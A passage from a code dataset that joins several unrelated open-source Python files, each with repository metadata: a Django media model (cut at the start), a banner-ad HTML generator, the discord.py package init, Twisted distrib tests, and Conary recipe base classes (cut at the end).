storage=media_protected_storage,
upload_to=media_path,
verbose_name=_('Mídia'),
validators=[restringe_tipos_de_arquivo_midias])
content_type = models.CharField(
max_length=250,
default='')
midia = models.ForeignKey(
Midia, verbose_name=_('Mídia Versionada'),
related_name='versions',
on_delete=PROTECT)
def delete(self, using=None, keep_parents=False):
if self.file:
self.file.delete()
return models.Model.delete(
self, using=using, keep_parents=keep_parents)
def save(self, force_insert=False, force_update=False, using=None,
update_fields=None, with_file=None):
_ret = models.Model.save(self, force_insert=force_insert,
force_update=force_update, using=using, update_fields=update_fields)
if not with_file:
return _ret
mime, ext = restringe_tipos_de_arquivo_midias(with_file)
name_file = 'midia.%s' % ext
self.content_type = mime
self.file.save(name_file, File(with_file))
@cached_property
def simple_name(self):
return self.file.name.split('/')[-1]
@cached_property
def width(self):
try:
nf = '%s/%s' % (media_protected_storage.location, self.file.name)
im = Image.open(nf)
return im.width
except:
return 0
@cached_property
def height(self):
try:
nf = '%s/%s' % (media_protected_storage.location, self.file.name)
im = Image.open(nf)
return im.height
except:
return 0
@cached_property
def is_paisagem(self):
return self.height < self.width
def rotate(self, rotate):
import os
try:
nf = '%s/%s' % (media_protected_storage.location, self.file.name)
im = Image.open(nf)
im = im.rotate(rotate, resample=LANCZOS, expand=True)
im.save(nf, dpi=(300, 300))
im.close()
dirname = os.path.dirname(self.file.path)
for f in os.listdir(dirname):
filename = '%s/%s' % (dirname, f)
if filename == nf:
continue
os.remove(filename)
except Exception as e:
pass
def thumbnail(self, width='thumb'):
sizes = {
'24': (24, 24),
'48': (48, 48),
'96': (96, 96),
'128': (128, 128),
'256': (256, 256),
'512': (512, 512),
'768': (768, 768),
'1024': (1024, 1024),
}
if width not in sizes:
width = '96'
nf = '%s/%s' % (media_protected_storage.location, self.file.name)
nft = nf.split('/')
nft = '%s/%s.%s' % ('/'.join(nft[:-1]), width, nft[-1])
if os.path.exists(nft):
file = io.open(nft, 'rb')
return file
im = Image.open(nf)
if sizes[width][0] >= im.width:
file = io.open(nf, 'rb')
else:
if sizes[width][0] < 512:
if im.width > im.height:
im.thumbnail(sizes[width])
else:
size = (
int(sizes[width][0] * (im.width / im.height)),
int(sizes[width][1] * (im.width / im.height))
)
im.thumbnail(size)
else:
im.thumbnail(sizes[width], resample=LANCZOS)
im.save(nft)
im.close()
file = io.open(nft, 'rb')
return file
def icon(self):
return self.get_filename.split('.')[-1]
class Meta:
ordering = ('-created',)
verbose_name = _('Mídia')
verbose_name_plural = _('Mídias')
class CaixaPublicacao(models.Model):
key = models.CharField(
max_length=250,
default='')
nome = models.CharField(
max_length=250,
default='')
classe = models.ForeignKey(
Classe,
related_name='caixapublicacao_set',
verbose_name=_('Classes'),
blank=True, null=True, default=None,
on_delete=PROTECT)
documentos = models.ManyToManyField(
'sigad.Documento', blank=True,
through='CaixaPublicacaoRelationship',
through_fields=('caixapublicacao', 'documento'),
related_query_name='caixapublicacao_set',
verbose_name=_('Documentos da Caixa de Públicação'),
symmetrical=False)
def reordene(self):
ordem = 0
for cpd in self.caixapublicacaorelationship_set.all():
ordem += 1000
cpd.ordem = ordem
cpd.save()
def __str__(self):
if self.classe:
return '%s (%s)' % (self.nome, self.classe)
else:
return self.nome
class Meta:
verbose_name = _('Caixa de Publicação')
verbose_name_plural = _('Caixas de Publicação')
class CaixaPublicacaoClasse(CaixaPublicacao):
class Meta:
proxy = True
verbose_name = _('Caixa de Publicação')
verbose_name_plural = _('Caixas de Publicação')
class CaixaPublicacaoRelationship(models.Model):
caixapublicacao = models.ForeignKey(
CaixaPublicacao, on_delete=models.CASCADE)
documento = models.ForeignKey(Documento, on_delete=models.CASCADE)
ordem = models.PositiveIntegerField(default=0)
def __str__(self):
return '{:02d} - {}'.format(self.ordem // 1000, self.documento)
class Meta:
unique_together = ('caixapublicacao', 'documento')
ordering = ('ordem', '-documento')
verbose_name = _('Documentos da Caixa de Publicação')
verbose_name_plural = _('Documentos da Caixa de Publicação')
| cmjatai/cmj | cmj/sigad/models.py | Python | gpl-3.0 | 49,449 | 0.000243 |
# -- coding: utf-8 --
# Copyright 2015 Tim Santor
#
# This file is part of proprietary software and use of this file
# is strictly prohibited without written consent.
#
# @author Tim Santor <tsantor@xstudios.agency>
"""Generates HTML for HTML5 banner ads."""
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import logging
import os
import re
import shlex
import shutil
import time
from subprocess import PIPE, Popen
import pkg_resources
import six
import six.moves.configparser as configparser
from bashutils import logmsg
from .adkit import AdKitBase
# -----------------------------------------------------------------------------
class Main(AdKitBase):
"""Generates HTML for HTML5 banner ads."""
def __init__(self):
self.logger = logging.getLogger(__name__)
super(Main, self).__init__()
# def copy_files(self):
# """Copy files."""
# dest = os.path.join(self.input_dir, 'js')
# if not os.path.isdir(dest):
# if self.verbose:
# logmsg.info('Creating "js" directory...')
# shutil.copytree(self.get_data('js'), dest)
# else:
# if self.verbose:
# logmsg.warning('"js" directory already exists')
@staticmethod
def replace_all(text, dict):
"""Replace all."""
for src, target in six.iteritems(dict):
text = text.replace(src, target)
return text
def create_divs(self, dirpath):
jpg_files = self.get_files_matching(dirpath, '*.jpg')
png_files = self.get_files_matching(dirpath, '*.png')
all_files = jpg_files + png_files
output = ''
for f in all_files:
basename = os.path.basename(f)
name = os.path.splitext(basename)[0]
if basename in self.ignore_list:
continue
output += '<div id="{0}"></div>\n'.format(name)
# soup=BeautifulSoup(output, "html.parser")
# pretty_html=soup.prettify()
return output
def create_html(self, filename):
"""
Create a HTML file for an ad.
:param str size: width x height (eg - 300x250)
:param str name: output file name
:rtype bool:
"""
# get filename and extension
# basename = os.path.basename(filename)
# name = os.path.splitext(basename)[0]
dirpath = os.path.dirname(filename)
# get size
# size = self.get_size_from_filename(name)
size = self.get_size_from_dirname(filename)
# get width height based on size string (eg - 300x250)
width, height = size.split('x')
# create divs
divs = self.create_divs(dirpath)
# open the template and open a new file for writing
html = pkg_resources.resource_string(__name__, 'templates/' + self.type + '/index.html').decode("utf-8")
#print(html)
outfile = open(filename, 'w')
# replace the variables with the correct value
replacements = {
# '{{filename}}': name,
# '{{size}}': size,
'{{width}}': width,
'{{height}}': height,
'{{divs}}': divs,
}
html = Main.replace_all(html, replacements)
outfile.write(html)
outfile.close()
logmsg.success('"{0}" generated successfully'.format(filename))
def generate_html(self, dirs):
"""
Loop through all folders in the input directory and create an HTML page.
"""
num_files = 0
for d in dirs:
filepath = os.path.join(d, 'index.html')
if not os.path.exists(filepath):
self.create_html(filepath)
num_files+=1
else:
logmsg.warning('"{0}" already exists'.format(filepath))
logmsg.success('Generated {0} HTML files'.format(num_files))
def get_parser(self):
"""Return the parsed command line arguments."""
parser = argparse.ArgumentParser(
description='Generate HTML for banners..')
parser.add_argument('type', choices=['doubleclick', 'sizemek', 'adwords', 'dcm'], help='Ad type')
parser.add_argument('-l', '--log', help='Enable logging',
action='store_true')
return parser.parse_args()
def run(self):
"""Run script."""
config = self.get_config()
args = self.get_parser()
if args.log:
self.create_logger()
self.logger.debug('-' * 10)
self.type = args.type
self.input_dir = config.get('html5', 'input')
self.ignore_list = self.create_list(config.get('html5', 'exclude_list'))
# Check if the input dir exists
if not os.path.isdir(self.input_dir):
logmsg.error('"{0}" does not exist'.format(self.input_dir))
sys.exit()
# Do the stuff we came here to do
dirs = self.find_ad_dirs()
self.generate_html(dirs)
logmsg.success('HTML Generated')
# -----------------------------------------------------------------------------
def main():
"""Main script."""
script = Main()
script.run()
# -----------------------------------------------------------------------------
if __name__ == "__main__":
main()
| tsantor/banner-ad-toolkit | adkit/generate_html.py | Python | mit | 5,427 | 0.00129 |
# -*- coding: utf-8 -*-
"""
Discord API Wrapper
~~~~~~~~~~~~~~~~~~~
A basic wrapper for the Discord API.
:copyright: (c) 2015-2016 Rapptz
:license: MIT, see LICENSE for more details.
"""
__title__ = 'discord'
__author__ = 'Rapptz'
__license__ = 'MIT'
__copyright__ = 'Copyright 2015-2016 Rapptz'
__version__ = '0.11.0'
from .client import Client, AppInfo, ChannelPermissions
from .user import User
from .game import Game
from .channel import Channel, PrivateChannel
from .server import Server
from .member import Member, VoiceState
from .message import Message
from .errors import *
from .calls import CallMessage, GroupCall
from .permissions import Permissions, PermissionOverwrite
from .role import Role
from .colour import Color, Colour
from .invite import Invite
from .object import Object
from . import utils, opus, compat
from .voice_client import VoiceClient
from .enums import ChannelType, ServerRegion, Status, MessageType
from collections import namedtuple
import logging
VersionInfo = namedtuple('VersionInfo', 'major minor micro releaselevel serial')
version_info = VersionInfo(major=0, minor=11, micro=0, releaselevel='final', serial=0)
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
| Aurous/Magic-Discord-Bot | discord/__init__.py | Python | gpl-3.0 | 1,365 | 0.001465 |
# Copyright (c) 2008-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.distrib}.
"""
from os.path import abspath
from xml.dom.minidom import parseString
try:
import pwd
except ImportError:
pwd = None
from zope.interface.verify import verifyObject
from twisted.python import log, filepath
from twisted.internet import reactor, defer
from twisted.trial import unittest
from twisted.spread import pb
from twisted.web import http, distrib, client, resource, static, server
from twisted.web.test.test_web import DummyRequest
from twisted.web.test._util import _render
class MySite(server.Site):
def stopFactory(self):
if hasattr(self, "logFile"):
if self.logFile != log.logfile:
self.logFile.close()
del self.logFile
class PBServerFactory(pb.PBServerFactory):
def buildProtocol(self, addr):
self.proto = pb.PBServerFactory.buildProtocol(self, addr)
return self.proto
class DistribTest(unittest.TestCase):
port1 = None
port2 = None
sub = None
f1 = None
def tearDown(self):
dl = [defer.Deferred(), defer.Deferred()]
if self.f1 is not None:
self.f1.proto.notifyOnDisconnect(lambda: dl[0].callback(None))
else:
dl[0].callback(None)
if self.sub is not None:
self.sub.publisher.broker.notifyOnDisconnect(
lambda: dl[1].callback(None))
self.sub.publisher.broker.transport.loseConnection()
else:
dl[1].callback(None)
http._logDateTimeStop()
if self.port1 is not None:
dl.append(self.port1.stopListening())
if self.port2 is not None:
dl.append(self.port2.stopListening())
return defer.gatherResults(dl)
def testDistrib(self):
# site1 is the publisher
r1 = resource.Resource()
r1.putChild("there", static.Data("root", "text/plain"))
site1 = server.Site(r1)
self.f1 = PBServerFactory(distrib.ResourcePublisher(site1))
self.port1 = reactor.listenTCP(0, self.f1)
self.sub = distrib.ResourceSubscription("127.0.0.1",
self.port1.getHost().port)
r2 = resource.Resource()
r2.putChild("here", self.sub)
f2 = MySite(r2)
self.port2 = reactor.listenTCP(0, f2)
d = client.getPage("http://127.0.0.1:%d/here/there" % \
self.port2.getHost().port)
d.addCallback(self.failUnlessEqual, 'root')
return d
def test_requestHeaders(self):
"""
The request headers are available on the request object passed to a
distributed resource's C{render} method.
"""
requestHeaders = {}
class ReportRequestHeaders(resource.Resource):
def render(self, request):
requestHeaders.update(dict(
request.requestHeaders.getAllRawHeaders()))
return ""
distribRoot = resource.Resource()
distribRoot.putChild("headers", ReportRequestHeaders())
distribSite = server.Site(distribRoot)
self.f1 = distribFactory = PBServerFactory(
distrib.ResourcePublisher(distribSite))
distribPort = reactor.listenTCP(
0, distribFactory, interface="127.0.0.1")
self.addCleanup(distribPort.stopListening)
addr = distribPort.getHost()
self.sub = mainRoot = distrib.ResourceSubscription(
addr.host, addr.port)
mainSite = server.Site(mainRoot)
mainPort = reactor.listenTCP(0, mainSite, interface="127.0.0.1")
self.addCleanup(mainPort.stopListening)
mainAddr = mainPort.getHost()
request = client.getPage("http://%s:%s/headers" % (
mainAddr.host, mainAddr.port),
headers={'foo': 'bar'})
def cbRequested(result):
self.assertEquals(requestHeaders['Foo'], ['bar'])
request.addCallback(cbRequested)
return request
def test_connectionLost(self):
"""
If there is an error issuing the request to the remote publisher, an
error response is returned.
"""
# Using pb.Root as a publisher will cause request calls to fail with an
# error every time. Just what we want to test.
self.f1 = serverFactory = PBServerFactory(pb.Root())
self.port1 = serverPort = reactor.listenTCP(0, serverFactory)
self.sub = subscription = distrib.ResourceSubscription(
"127.0.0.1", serverPort.getHost().port)
request = DummyRequest([''])
d = _render(subscription, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 500)
# This is the error we caused the request to fail with. It should
# have been logged.
self.assertEqual(len(self.flushLoggedErrors(pb.NoSuchMethod)), 1)
d.addCallback(cbRendered)
return d
class _PasswordDatabase:
def __init__(self, users):
self._users = users
def getpwall(self):
return iter(self._users)
def getpwnam(self, username):
for user in self._users:
if user[0] == username:
return user
raise KeyError()
class UserDirectoryTests(unittest.TestCase):
"""
Tests for L{UserDirectory}, a resource for listing all user resources
available on a system.
"""
def setUp(self):
self.alice = ('alice', 'x', 123, 456, 'Alice,,,', self.mktemp(), '/bin/sh')
self.bob = ('bob', 'x', 234, 567, 'Bob,,,', self.mktemp(), '/bin/sh')
self.database = _PasswordDatabase([self.alice, self.bob])
self.directory = distrib.UserDirectory(self.database)
def test_interface(self):
"""
L{UserDirectory} instances provide L{resource.IResource}.
"""
self.assertTrue(verifyObject(resource.IResource, self.directory))
def _404Test(self, name):
"""
Verify that requesting the C{name} child of C{self.directory} results
in a 404 response.
"""
request = DummyRequest([name])
result = self.directory.getChild(name, request)
d = _render(result, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_getInvalidUser(self):
"""
L{UserDirectory.getChild} returns a resource which renders a 404
response when passed a string which does not correspond to any known
user.
"""
return self._404Test('carol')
def test_getUserWithoutResource(self):
"""
L{UserDirectory.getChild} returns a resource which renders a 404
response when passed a string which corresponds to a known user who has
neither a user directory nor a user distrib socket.
"""
return self._404Test('alice')
def test_getPublicHTMLChild(self):
"""
L{UserDirectory.getChild} returns a L{static.File} instance when passed
the name of a user with a home directory containing a I{public_html}
directory.
"""
home = filepath.FilePath(self.bob[-2])
public_html = home.child('public_html')
public_html.makedirs()
request = DummyRequest(['bob'])
result = self.directory.getChild('bob', request)
self.assertIsInstance(result, static.File)
self.assertEqual(result.path, public_html.path)
def test_getDistribChild(self):
"""
L{UserDirectory.getChild} returns a L{ResourceSubscription} instance
when passed the name of a user suffixed with C{".twistd"} who has a
home directory containing a I{.twistd-web-pb} socket.
"""
home = filepath.FilePath(self.bob[-2])
home.makedirs()
web = home.child('.twistd-web-pb')
request = DummyRequest(['bob'])
result = self.directory.getChild('bob.twistd', request)
self.assertIsInstance(result, distrib.ResourceSubscription)
self.assertEqual(result.host, 'unix')
self.assertEqual(abspath(result.port), web.path)
def test_render(self):
"""
L{UserDirectory} renders a list of links to available user content.
"""
public_html = filepath.FilePath(self.alice[-2]).child('public_html')
public_html.makedirs()
web = filepath.FilePath(self.bob[-2])
web.makedirs()
# This really only works if it's a unix socket, but the implementation
# doesn't currently check for that. It probably should someday, and
# then skip users with non-sockets.
web.child('.twistd-web-pb').setContent("")
request = DummyRequest([''])
result = _render(self.directory, request)
def cbRendered(ignored):
document = parseString(''.join(request.written))
# Each user should have an li with a link to their page.
[alice, bob] = document.getElementsByTagName('li')
self.assertEqual(alice.firstChild.tagName, 'a')
self.assertEqual(alice.firstChild.getAttribute('href'), 'alice/')
self.assertEqual(alice.firstChild.firstChild.data, 'Alice (file)')
self.assertEqual(bob.firstChild.tagName, 'a')
self.assertEqual(bob.firstChild.getAttribute('href'), 'bob.twistd/')
self.assertEqual(bob.firstChild.firstChild.data, 'Bob (twistd)')
result.addCallback(cbRendered)
return result
def test_passwordDatabase(self):
"""
If L{UserDirectory} is instantiated with no arguments, it uses the
L{pwd} module as its password database.
"""
directory = distrib.UserDirectory()
self.assertIdentical(directory._pwd, pwd)
if pwd is None:
test_passwordDatabase.skip = "pwd module required"
| Donkyhotay/MoonPy | twisted/web/test/test_distrib.py | Python | gpl-3.0 | 9,985 | 0.002203 |
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
BaseRequiresRecipe = '''
class BaseRequiresRecipe(Recipe):
"""
NAME
====
B{C{BaseRequiresRecipe}} - Base class which provides basic buildRequires
for all recipes that follow the PackageRecipe approach to instantiating
a destination directory.
SYNOPSIS
========
C{BaseRequiresRecipe} is inherited by the other *PackageRecipe,
DerivedPackageRecipe and *InfoRecipe super classes.
DESCRIPTION
===========
The C{BaseRequiresRecipe} class provides Conary recipes with references to
the essential troves which offer Conary's packaging requirements.
(python, sqlite, and conary)
Other PackageRecipe classes such as C{AutoPackageRecipe} inherit the
buildRequires offered by C{BaseRequiresRecipe}.
"""
name = "baserequires"
internalAbstractBaseClass = 1
buildRequires = [
'bash:runtime',
'conary-build:lib',
'conary-build:python',
'conary-build:runtime',
'conary:python',
'conary:runtime',
'coreutils:runtime',
'dev:runtime',
'filesystem:runtime',
'findutils:runtime',
'gawk:runtime',
'grep:runtime',
'python:lib',
'python:runtime',
'sed:runtime',
'setup:runtime',
'sqlite:lib',
]
_recipeType = None
'''
PackageRecipe = '''class PackageRecipe(SourcePackageRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{PackageRecipe}} - Base class which provides Conary functionality
SYNOPSIS
========
C{PackageRecipe} is inherited by the other *PackageRecipe super classes
DESCRIPTION
===========
The C{PackageRecipe} class provides Conary recipes with references to
the essential troves which offer Conary's packaging requirements.
(python, sqlite, gzip, bzip2, tar, cpio, and patch)
Other PackageRecipe classes such as C{AutoPackageRecipe} inherit the
functionality offered by C{PackageRecipe}.
EXAMPLE
=======
A sample class that uses PackageRecipe to download source code from
a web site, unpack it, run "make", then run "make install"::
class ExamplePackage(PackageRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.addArchive('http://code.example.com/example/')
r.Make()
r.MakeInstall()
"""
name = 'package'
internalAbstractBaseClass = 1
buildRequires = [
'bzip2:runtime',
'gzip:runtime',
'tar:runtime',
'cpio:runtime',
'patch:runtime',
]'''
groupDescription = '''A group refers to a collection of references to specific troves
(specific name, specific version, and specific flavor); the troves
may define all the software required to install a system, or sets of
troves that are available for a system, or other groups. Each group
may contain any kind of trove, including other groups, and groups
may reference other groups built at the same time as well as other
groups that exist in a repository.'''
GroupRecipe = '''
class GroupRecipe(_GroupRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{r.GroupRecipe()}} - Provides the original type of recipe interface
for creating groups.
DESCRIPTION
===========
The C{r.GroupRecipe} class provides the original interface for creating
groups that are stored in a Conary repository.
''' + groupDescription + '''
Most C{r.GroupRecipe} user commands accept a B{groupName}
parameter. This parameter specifies the group a particular command
applies to. For example, C{r.add('foo', groupName='group-bar')}
attempts to add the trove I{foo} to the group I{group-bar}.
The group specified by B{groupName} must exist, or be created before
troves may be added to it. The B{groupName} parameter may also be a list
of groups in which case the command will be applied to all groups. If
B{groupName} is not specified, or is None, then the command will apply to
the current default group.
PARAMETERS
==========
Several parameters may be set at the time of group creation. Although
these parameters are typically passed to C{r.createGroup()} for the
base group, they should be set as variables in the recipe class.
Note: Setting these parameters affects not only the value for the base
group, but also the default value for all newly created groups. For
example, if B{autoResolve} is set to C{True} in the base group, all other
groups created will have autoResolve set to C{True} by default.
B{imageGroup} is an exception to this rule; it will not propogate to
sub groups.
The following parameters are accepted by C{r.GroupRecipe} with default
values indicated in parentheses when applicable:
B{depCheck} : (False) If set to C{True}, Conary will check for dependency
closure in this group, and raise an error if closure is not found.
B{autoResolve} : (False) If set to C{True}, Conary will include any extra
troves needed to make this group dependency complete.
B{checkOnlyByDefaultDeps} : (True) Conary only checks the
dependencies of troves that are installed by default, referenced in the
group. If set to C{False}, Conary will also check the dependencies of
B{byDefault} C{False} troves. Doing this, however, will prevent groups
with C{autoResolve}=C{True} from changing the C{byDefault} status of
required troves.
B{checkPathConflicts} : (True) Conary checks for path conflicts in each
group by default to ensure that the group can be installed without path
conflicts. Setting this parameter to C{False} will disable the check.
B{imageGroup} : (True) Indicates that this group defines a complete,
functioning system, as opposed to a group representing a system
component or a collection of multiple groups that might or might not
collectively define a complete, functioning system.
Image group policies will be executed separately for each image group.
This setting is recorded in the troveInfo for the group. This setting
does not propogate to subgroups.
METHODS
=======
The following methods are applicable in Conary group recipes:
- L{add} : Adds a trove to a group
- L{addAll} : Add all troves directly contained in a given reference
to groupName
- L{addNewGroup} : Adds one newly created group to another newly
created group
- L{addReference} : (Deprecated) Adds a reference to a trove
- L{createGroup} : Creates a new group
- L{copyComponents}: Add components to one group by copying them
from the components in another group
- L{moveComponents}: Add components to one group, removing them
from the other in the process.
- L{remove} : Removes a trove
- L{removeComponents} : Define components which should not be
installed
- L{removeItemsAlsoInGroup}: removes troves in the group specified
that are also in the current group
- L{removeItemsAlsoInNewGroup}: removes troves in the group specified
that are also in the current group
- L{Requires} : Defines a runtime requirement for group
- L{requireLatest} : Raise an error if add* commands resolve to older
trove than the latest on branch. This can occur when a flavor of
a trove exists that is not the latest version.
- L{replace} : Replace troves
- L{setByDefault} : Set troves to be added to group by default
- L{setDefaultGroup} : Defines default group
- L{setSearchPath} : Specify the searchPath to search for troves
"""
name = 'group'
internalAbstractBaseClass = 1
'''
GroupSetRecipe = '''
class GroupSetRecipe(_GroupSetRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{r.GroupSetRecipe()}} - Provides a set-oriented recipe interface
for creating groups.
DESCRIPTION
===========
The C{r.GroupSetRecipe} class provides a set-oriented interface for
creating groups that are stored in a Conary repository.
''' + groupDescription + '''
In a C{GroupSetRecipe}, almost all the operations are operations
on sets of references to troves, called B{TroveSets}. Each trove
reference in a TroveSet is a three-tuple of B{name}, B{version},
B{flavor}, along with an attribute, C{isInstalled}, that describes
whether the trove is considered B{installed} or B{optional}. Each
TroveSet is immutable. TroveSet operations return new TroveSets;
they do not modify existing TroveSets.
A TroveSet is created either by reference to other TroveSets or
by reference to a Repository. A C{GroupSetRecipe} must have at
least one C{Repository} object. A C{Repository} object has a
default search label list and default flavor, but can be used to
find any trove in any accessible Conary repository.
Repositories and TroveSets can be combined in order in a C{SearchPath}
object. A C{SearchPath} object can be used both for looking up
troves and as a source of troves for dependency resolution.
TroveSets in a SearchPath are searched recursively only when used
to look up dependencies; only the troves mentioned explicitly are
searched using C{find}. (Use C{TroveSet.flatten()} if you want to
search a TroveSet recursively using C{find}.)
Finally, the ultimate purpose of a group recipe is to create a
new binary group or set of groups. TroveSets have a C{createGroup}
method that creates binary groups from the TroveSets. (The binary
group with the same name as the source group can be created using
the C{Group} method, which itself calls C{createGroup}.) In the binary
groups created by C{Group} or C{createGroup}, the C{byDefault} flag
is used to indicate B{installed} (C{byDefault=True}) or B{optional}
(C{byDefault=False}).
In summary, C{Repository} objects are the source of all references
to troves in TroveSets, directly or indirectly. The TroveSets are
manipulated in various ways until they represent the desired groups,
and then those groups are built with C{createGroup} (or C{Group}).
METHODS
=======
The following recipe methods are available in Conary group set recipes:
- L{Repository} : Creates an object representing a respository
with a default search label list and flavor.
- L{SearchPath} : Creates an object in which to search for
troves or dependencies.
- L{Group} : Creates the primary group object.
- L{Script} : Creates a single script object.
- L{Scripts} : Associates script objects with script types.
- L{SystemModel} : Converts a system model to a TroveSet.
- L{dumpAll} : Displays copious output describing each action.
- L{track} : Displays less copious output describing specific
troves.
- L{writeDotGraph} : Writes "dot" graph of recipe structure.
The following methods are available in C{Repository} objects:
- C{Repository.find} : Search the Repository for specified troves
- C{Repository.latestPackages} : Get latest normal packages of the
default flavor on the default label
The following methods are available in C{SearchPath} objects:
- C{SearchPath.find} : Search the SearchPath for specified troves
The following methods are available in C{TroveSet} objects:
- C{TroveSet.components} : Recursively search for named components
- C{TroveSet.createGroup} : Create a binary group
- C{TroveSet.depsNeeded} : Get troves satisfying dependencies
- C{TroveSet.difference} : Subtract one TroveSet from another (C{-})
- C{TroveSet.dump} : Debugging: print the contents of the TroveSet
- C{TroveSet.find} : Search the TroveSet for specified troves
- C{TroveSet.findByName} : Find troves by regular expression
- C{TroveSet.findBySourceName} : Find troves by the name of the source
package from which they were built
- C{TroveSet.flatten} : Resolve trove references recursively
- C{TroveSet.getInstall} : Get only install troves from set
- C{TroveSet.getOptional} : Get only optional troves from set
- C{TroveSet.isEmpty} : Assert that the TroveSet is entirely empty
- C{TroveSet.isNotEmpty} : Assert that the TroveSet contains something
- C{TroveSet.makeInstall} : Make all troves install, or add all
provided troves as install troves
- C{TroveSet.makeOptional} : Make all troves optional, or add all
provided troves as optional troves
- C{TroveSet.members} : Resolve exactly one level of trove
references, return only those resolved references
- C{TroveSet.packages} : Resolve trove references recursively,
return packages
- C{TroveSet.patch} : Replace troves in the TroveSet with
matching-named troves from the replacement set
- C{TroveSet.union} : Get the union of all provided TroveSets (C{|}, C{+})
- C{TroveSet.update} : Replace troves in the TroveSet with
all troves from the replacement set
Except for C{TroveSet.dump}, which prints debugging information,
each of these C{Repository}, C{SearchPath}, and C{TroveSet} methods
returns a C{TroveSet}.
EXAMPLE
=======
This is an example recipe that uses the search path included in
a product definition, if available, to provide a stable search.
It adds to the base C{group-appliance-platform} the httpd, mod_ssl,
and php packages, as well as all the required dependencies::
class GroupMyAppliance(GroupSetRecipe):
name = 'group-my-appliance'
version = '1.0'
def setup(r):
r.dumpAll()
repo = r.Repository('conary.rpath.com@rpl:2', r.flavor)
searchPathList = [ r.Repository(r.macros.buildlabel, r.flavor) ]
if 'productDefinitionSearchPath' in r.macros:
# proper build with product definition
searchPathList.extend([repo[x] for x in
r.macros.productDefinitionSearchPath.split('\\\\n')])
else:
# local test build
searchPathList.append(
repo['group-os=conary.rpath.com@rpl:2'])
searchPath = r.SearchPath(*searchPathList)
base = searchPath['group-appliance-platform']
additions = searchPath.find(
'httpd',
'mod_ssl',
'php')
# We know that base is dependency-closed and consistent
# with the searchPath, so just get the extra deps we need
deps = (additions + base).depsNeeded(searchPath)
r.Group(base + additions + deps)
Next, an example of building a platform derived from another platform,
adding all packages defined locally to the group::
class GroupMyPlatform(GroupSetRecipe):
name = 'group-my-platform'
version = '1.0'
def setup(r):
centOS = r.Repository('centos.rpath.com@rpath:centos-5', r.flavor)
local = r.Repository('repo.example.com@example:centos-5', r.flavor)
pkgs = centOS['group-packages']
std = centOS['group-standard']
localPackages = localRepo.latestPackages()
std += localPackages
pkgs += localPackages
stdGrp = std.createGroup('group-standard')
pkgGrp = pkgs.createGroup('group-packages')
r.Group(stdGrp + pkgGrp)
"""
name = 'groupset'
internalAbstractBaseClass = 1
'''
BuildPackageRecipe = '''class BuildPackageRecipe(PackageRecipe):
"""
NAME
====
B{C{BuildPackageRecipe}} - Build packages requiring Make and shell
utilities
SYNOPSIS
========
C{class I{className(BuildPackageRecipe):}}
DESCRIPTION
===========
The C{BuildPackageRecipe} class provides recipes with capabilities for
building packages which require the C{make} utility, and additional,
standard shell tools, (coreutils) and the programs needed to run
C{configure}. (findutils, C{gawk}, C{grep}, C{sed}, and diffutils)
C{BuildPackageRecipe} inherits from C{PackageRecipe}, and therefore
includes all the build requirements of C{PackageRecipe}.
EXAMPLE
=======
C{class DocbookDtds(BuildPackageRecipe):}
Uses C{BuildPackageRecipe} to define the class for a Docbook Document Type
Definition collection recipe.
"""
name = 'buildpackage'
internalAbstractBaseClass = 1
buildRequires = [
'coreutils:runtime',
'make:runtime',
'mktemp:runtime',
# all the rest of these are for configure
'file:runtime',
'findutils:runtime',
'gawk:runtime',
'grep:runtime',
'sed:runtime',
'diffutils:runtime',
]
Flags = use.LocalFlags'''
CPackageRecipe = '''class CPackageRecipe(BuildPackageRecipe):
"""
NAME
====
B{C{CPackageRecipe}} - Build packages consisting of binaries built from C
source code
SYNOPSIS
========
C{class I{className(CPackageRecipe):}}
DESCRIPTION
===========
The C{CPackageRecipe} class provides the essential build requirements
needed for packages consisting of binaries built from C source code, such
as the linker and C library. C{CPacakgeRecipe} inherits from
C{BuildPackageRecipe}, and therefore includes all the build requirements of
C{BuildPackageRecipe}.
Most package recipes which are too complex for C{AutoPackageRecipe}, and
consist of applications derived from C source code which do not require
additional shell utilities as build requirements use the
C{CPackageRecipe} class.
EXAMPLE
=======
C{class Bzip2(CPackageRecipe):}
Defines the class for a C{bzip2} recipe using C{AutoPackageRecipe}.
"""
name = 'cpackage'
internalAbstractBaseClass = 1
buildRequires = [
'binutils:runtime',
'binutils:lib',
'binutils:devellib',
'gcc:runtime',
'gcc:lib',
'gcc:devel',
'gcc:devellib',
'glibc:runtime',
'glibc:lib',
'glibc:devellib',
'glibc:devel',
'libgcc:lib',
'libgcc:devellib',
'debugedit:runtime',
'elfutils:runtime',
]
Flags = use.LocalFlags'''
AutoPackageRecipe = '''class AutoPackageRecipe(CPackageRecipe):
"""
NAME
====
B{C{AutoPackageRecipe}} - Build simple packages with auto* tools
SYNOPSIS
========
C{class I{className(AutoPackageRecipe):}}
DESCRIPTION
===========
The C{AutoPackageRecipe} class provides a simple means for the
creation of packages from minimal recipes, which are built from source
code using the auto* tools, such as C{automake}, and C{autoconf}.
Processing in the C{AutoPackageRecipe} class is a simple workflow modeled
after building software from source code, and is essentially comprised of
these steps:
1. Unpack source archive
2. C{configure}
3. C{make}
4. C{make install}
5. Applying Conary policy (optional)
With C{AutoPackageRecipe} the recipe writer does not necessarily need to
define the C{Configure}, C{Make}, or C{MakeInstall} methods, which allows
for very compact, and simple recipes.
The recipe's child classes should define the C{unpack()} method in order
to populate the source list.
Invoke the C{policy} method, with necessary policy parameters, and
keywords in your recipe to enforce Conary policy in the package.
